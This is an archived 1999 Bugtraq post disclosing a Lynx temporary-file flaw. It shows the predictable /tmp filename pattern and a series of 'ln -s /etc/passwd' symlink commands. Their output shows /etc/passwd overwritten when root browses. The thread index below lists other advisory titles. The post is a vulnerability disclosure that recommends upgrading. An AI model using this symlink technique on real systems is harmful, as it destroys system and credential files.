Bugtraq mailing list archives
Lynx /tmp problem
From: diego () HERCULES UNIVALLE EDU CO (Juan Diego Bolanos)
Date: Tue, 9 Feb 1999 20:57:30 -0500
Hi Aleph, please filter this if already posted.... ------ Hello.... I have found a bug in Lynx all versions, except the latest stable release... lynx create temporary files in /tmp in this way.... L[num proc]-xTMP.html where [num proc] is the proc number in the machine x is a number from 0 to 9 if i run lynx like any user, for example root we see this earthworm:~$ ps PID TTY STAT TIME COMMAND 91 1 SW 0:06 (bash) 94 4 S 0:05 -bash 95 5 SW 0:06 (bash) 3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6: 3870 3 SW 0:02 (ssh) 3894 4 T 0:00 lynx 3898 4 R 0:00 ps then the files in /tmp created by lynx will be.. L3894-0TMP.html L3894-1TMP.html L3894-2TMP.html L3894-3TMP.html L3894-4TMP.html L3894-5TMP.html L3894-6TMP.html L3894-7TMP.html L3894-8TMP.html L3894-9TMP.html if i make a symlink from all of this files to any file in the system, for example.... earthworm:~$ cd /tmp earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html and now root (in this example) try to download a file, or press the backspace key to reach the history list, the file i have linked (in this case /etc/passwd) will be replaced with it... and now is owned by root... for example i got this in my system... earthworm:/tmp$ cat /etc/passwd <head> <title>Lynx History Page</title> </head> <body> <h1>You have reached the History Page</h1> <h2>Lynx Version 2.8rel2</h2> <pre><em>You selected:</em> <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a> <tab to=t0>file://localhost/root/firefaq.html </pre> </body> like you see, the file is lost now... this bug is lynx specific, so all OS are vulnerables.. Fix, upgrade to the latest lynx version, i have checked it, and it appear to use a L[proc num]-xTMP.html where x is from 0 to ???... i hope it is already fixed, creating 100 symlinks are not to hard :) the lynx team know this yet. by... Juan Diego
Current thread:
- Another Windows98 Bug..., (continued)
- Another Windows98 Bug... Scott (Feb 09)
- Re: Another Windows98 Bug... Jensen Allan AJE (Feb 12)
- mc & Segmentation fault shaman (Feb 12)
- Re: Another Windows98 Bug... Nick Lamb (Feb 12)
- Re: Another Windows98 Bug... Jensen Allan AJE (Feb 12)
- Re: SSH 1.x and 2.x Daemon Brandon S. Allbery (Feb 09)
- Re: SSH 1.x and 2.x Daemon Greg A. Woods (Feb 09)
- Re: SSH 1.x and 2.x Daemon Casper Dik (Feb 11)
- Re: SSH 1.x and 2.x Daemon Kevin Vajk (Feb 12)
- Rainbow Six Buffer Overflow..... Brian Gemberling (Feb 11)
- Re: SSH 1.x and 2.x Daemon Casper Dik (Feb 11)
- Access 97 Password Unmasker Nate Lawson (Feb 09)
- Lynx /tmp problem Juan Diego Bolanos (Feb 09)
- Re: Lynx /tmp problem Theo de Raadt (Feb 11)
- Re: Lynx /tmp problem Glynn Clements (Feb 12)
- Re: Lynx /tmp problem Piotr Klaban (Feb 15)
- Re: SSH 1.x and 2.x Daemon der Mouse (Feb 11)
- Re: SSH 1.x and 2.x Daemon Ronny Cook (Feb 11)
- Another Windows98 Bug... Scott (Feb 09)